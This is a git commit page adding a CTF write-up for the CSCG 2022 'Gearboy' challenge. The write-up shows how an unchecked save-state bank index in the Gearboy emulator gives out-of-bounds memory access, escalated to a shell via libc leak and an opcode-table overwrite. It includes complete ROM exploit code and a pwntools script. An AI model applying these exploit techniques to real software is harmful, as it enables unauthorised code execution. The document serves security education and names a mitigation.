cscg22-gearboy

CSCG 2022 Challenge 'Gearboy'
git clone https://git.sinitax.com/sinitax/cscg22-gearboy
Log | Files | Refs | sfeed.txt

commit 39bd35bbda75de0896245af60976b7e616d82ef2
parent 1d4298becbb12324db19c6f8eb5a63d0a54c9c36
Author: Louis Burda <quent.burda@gmail.com>
Date:   Thu,  2 Jun 2022 15:10:42 +0200

Added writeup

Diffstat:
Mmain.c | 3---
Awriteup/Makefile | 2++
Awriteup/document.md | 197+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Awriteup/writeup.pdf | 0
4 files changed, 199 insertions(+), 3 deletions(-)

diff --git a/main.c b/main.c @@ -32,9 +32,6 @@ main(void) libc = (*(uint64_t*)free_got_gb) - 0x9a6d0; - // target = libc + 0xe3afe; - // *(uint64_t*)free_got_gb = target; - target = libc + 0x52290; strcpy((char*)processor_gb, "/bin/sh"); *(uint64_t*)(processor_gb+0x10*0x10) = target; diff --git a/writeup/Makefile b/writeup/Makefile @@ -0,0 +1,2 @@ +writeup.pdf: document.md + pandoc -o $@ $< diff --git a/writeup/document.md b/writeup/document.md @@ -0,0 +1,197 @@ +--- +documentclass: extarticle +geometry: margin=2cm +title: Gearboy Writeup +author: sinitax +fontsize: 12pt +--- + +## Exploit + +The task is to gain remote code execution (atleast to the point of +reading the contents of the flag file) by manipulating only a gameboy +rom and state file which will be run on the server using a modified, +headless version of [*Gearboy*](https://github.com/drhelius/Gearboy), +a gameboy emulator. + +My immediate suspicions were with missing checks for the state file and +not the ROM, because the state can be saved at any time and its +generally easier to forget checks before every use instead of once upon +loading the ROM. + +By inspecting the source code for `GearboyCore::LoadState` we find the +functionality for the emulator split into many different classes and +a LoadState for each, e.g. `Processor::LoadState` and `Memory::LoadState`. + +`Memory::LoadState` loads among other things various memory bank buffers +as well as values which control which of those banks are selected. Since +the address space of the gameboy is limited (16-bit address space), parts +of the memory must be swapped out to facilitate access to larger amounts. +Often times and index is used to indicate which memory bank is in use, +as is the case with `WRAM1`: + +``` +u8* Memory::GetWRAM1() +{ + return m_bCGB ? m_pWRAMBanks + (0x1000 * m_iCurrentWRAMBank) : m_pMap + 0xD000; +} +``` + +As long as `m_bCGB` (a flag enabling gameboy color mode) is set, the +backing buffer of `WRAM1` will be chosen from a bank in `m_pWRAMBanks`. +The value of `m_bCGB` is controlled by special purpose bytes in the +ROM which we can control. + +Since `m_iCurrentWRAMBank` is loaded as part of the state and its value +is not properly sanitized, modifying this value in the state file allows us to +essentially mmap an arbitrary piece of memory into the address space of our +emulated game. When the running ROM writes and reads to `0xD000-0xE000`, +it will instead access the address we control. + +But where to write when ASLR's enabled? + +To get around ASLR we need to find objects on the heap with consistent +offsets to the `WRAM` bank buffer `m_pWRAMBanks`. We can do this by +running `gdbserver` in the docker container and observing the surrounding +memory and pointers of objects allocated closely before or after. The +fact that each session is a freshly spawned docker container helps +with consistency. + +Doing this we find a heap configuration which is consistent on every first +run in the docker container: the address of the `Processor` object is +at an offset of `-0x126a0` from `m_pWRAMBanks` and the `Memory` object +is at an offset of `-0xd0` from the `Processor` object. By setting the +`m_iCurrentWRAMBank` value to `-0x13` in the state file we will be able +to access the `Processor` object at `0x13000-0x126a0+0xD000=0xD960` +and the `Memory` object at `0x13000-0x125d0+0xD000=0xD890`. + +For every instruction, the processor resolves the function for handling +an opcode by looking it up in a table using the opcode as an index. This +`opcodeTable` is a member of the `Processor` object and as such stored +on the heap. By reading one of these function pointers and subtracting +its offset in the binary we can recover the base address at which the +gearboy emulator is loaded. + +Now that we know the base address and as a result the address of the +GOT, regularly the next natural step is to leak libc by reading the got, +calculate the address of system and overwrite a function pointer +to call system. The only problem is, we are still just a ROM in +an emulator and only have access to the memory mapped into `0xD000-0xE000`. + +We need to look for another access primitive. + +This time, however, we are not limited to our state and rom file contents. +We can manipulate the `Memory` and `Processor` objects directly! + +Looking through the source code again we find a good candidate: + +``` +u8* Memory::GetVRAM() +{ + if (m_bCGB) + return (m_iCurrentLCDRAMBank == 1) ? m_pLCDRAMBank1 : m_pMap + 0x8000; + else + return m_pMap + 0x8000; +} +``` + +We have already set `m_bCGB` and `m_iCurrentLCDRAMBank` is loaded from the +state file. As such, we can make access to `0x8000-0x9000` backed by the +`m_pLCDRAMBank1` buffer, whose pointer we control. + +We set `m_pLCDRAMBank1` in the `Memory` object to point to the target got +address of `free` which is calculated using the base address. We can then +read the `free` address from `0x8000`, leak the libc base and calculate +the `system` address. + +To finally call system, we overwrite a function pointer in +`Processor::opcodeTable` and call the corresponding opcode. +We ensure the first argument to `system` points to the string **/bin/sh** +by writing it to the address of the `Processor` object, as this is the address +in `rdi` when `system` is called. Since `opcodeTable` is the first +member in `Processor` we need to choose an opcode to call which does +not conflict with the space used for the string and also is not called +before the value can be fully written (as is the case with the load +instructions). The `stop` instruction (value `0x10`) is a good fit here. + +### Mitigation + +This attack can be mitigated by performing better input sanitization +when loading values from the state file. This would have prevented the +initial read / write out-of-bounds and as such the subsequent RCE. +This can be implemented for `m_iCurrentWRAMBank` as a simple range check. + +\newpage + +**ROM Code (compiled using GBDK):**\footnote{https://github.com/gbdk-2020/gbdk-2020/} + +```C +#include "stdint.h" +#include "string.h" + +void +main(void) +{ + volatile static uint8_t *processor_gb; + volatile static uint8_t *memory_gb; + volatile static uint8_t *free_got_gb; + volatile static uint64_t op0x00; + volatile static uint64_t base; + volatile static uint64_t libc; + volatile static uint64_t free_got; + volatile static uint64_t target; + + /* WRAM BANK = -0x13 */ + processor_gb = (void*) 0xD960; + memory_gb = processor_gb - 0xd0; + + /* get base from op0x00 */ + op0x00 = *(uint64_t*)processor_gb; + base = op0x00 - 0x1d420; + free_got = base + 0x4ad78; + + /* change lcdrambank pointer to access got */ + *(uint64_t*)(memory_gb+0x90) = free_got; + free_got_gb = (void*) 0x8000; + + libc = (*(uint64_t*)free_got_gb) - 0x9a6d0; + + target = libc + 0x52290; + strcpy((char*)processor_gb, "/bin/sh"); + *(uint64_t*)(processor_gb+0x10*0x10) = target; + + __asm \ + stop \ + __endasm; + + while (1); +} +``` + +\newpage + +**Upload and state modification script:** + +```python +from base64 import b64encode +from sys import argv,exit +from pwn import * + +rom = list(open("main.gb", "rb").read()) +state = list(open("main.state", "rb").read()) + +# set m_iCurrentWRAMBank +for i,v in enumerate(struct.pack("<i", -0x13)): + state[0x10000+i] = v + +# set m_iCurrentLCDRAMBank +for i,v in enumerate(struct.pack("<i", 1)): + state[0x10004+i] = v + +io = process(argv[1:]) + +io.sendline(b64encode(bytes(rom))) +io.sendline(b64encode(bytes(state))) + +io.interactive() +``` diff --git a/writeup/writeup.pdf b/writeup/writeup.pdf Binary files differ.